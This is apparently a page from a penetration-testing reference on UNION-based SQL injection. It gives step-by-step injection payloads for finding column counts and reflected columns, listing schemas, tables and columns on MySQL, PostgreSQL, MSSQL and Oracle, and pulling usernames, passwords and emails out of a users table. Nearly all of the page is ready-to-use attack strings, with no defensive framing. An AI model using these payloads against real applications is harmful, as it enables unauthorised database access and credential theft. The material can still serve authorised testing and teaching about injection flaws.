Skip to main content

UNION-Based SQL Injection

CWECWE-89
Toolssqlmap, ghauri
Difficulty🟡 intermediate

UNION-Based Extraction​

UNION-based injection is the most direct exploitation method when query results are reflected in the response. Use it to append additional SELECT statements and extract arbitrary data.

Prerequisite: The number of columns in the injected UNION SELECT must match the original query exactly.

Step 1: Determine Column Count​

Method A -- ORDER BY increment:

' ORDER BY 1--     -- Works
' ORDER BY 2--     -- Works
' ORDER BY 3--     -- Works
' ORDER BY 4--     -- Error! (only 3 columns)

Method B -- UNION NULL increment:

' UNION SELECT NULL--                        -- Error (wrong count)
' UNION SELECT NULL,NULL--                   -- Error (wrong count)
' UNION SELECT NULL,NULL,NULL--              -- Works! (3 columns)

Step 2: Identify Reflectable Columns​

Not all columns appear in the response. Find which ones are visible:

' UNION SELECT 'a',NULL,NULL--               -- Check if 'a' appears
' UNION SELECT NULL,'b',NULL--               -- Check if 'b' appears
' UNION SELECT NULL,NULL,'c'--               -- Check if 'c' appears

Or use unique markers:

' UNION SELECT 'MARKER1','MARKER2','MARKER3'--

Search the response for MARKER strings to identify reflectable positions.

Step 3: Extract Data​

List databases (MySQL):

' UNION SELECT schema_name,NULL,NULL FROM information_schema.schemata--

List tables:

-- MySQL/PostgreSQL
' UNION SELECT table_name,NULL,NULL FROM information_schema.tables WHERE table_schema='target_db'--

-- MSSQL
' UNION SELECT name,NULL,NULL FROM sysobjects WHERE xtype='U'--

-- Oracle
' UNION SELECT table_name,NULL,NULL FROM all_tables--

List columns:

-- MySQL/PostgreSQL
' UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'--

Extract data:

' UNION SELECT username,password,email FROM users--

Concatenate columns when only one is reflectable:

-- MySQL
' UNION SELECT CONCAT(username,':',password),NULL,NULL FROM users--

-- PostgreSQL/Oracle
' UNION SELECT username||':'||password,NULL,NULL FROM users--

-- MSSQL
' UNION SELECT username+':'+password,NULL,NULL FROM users--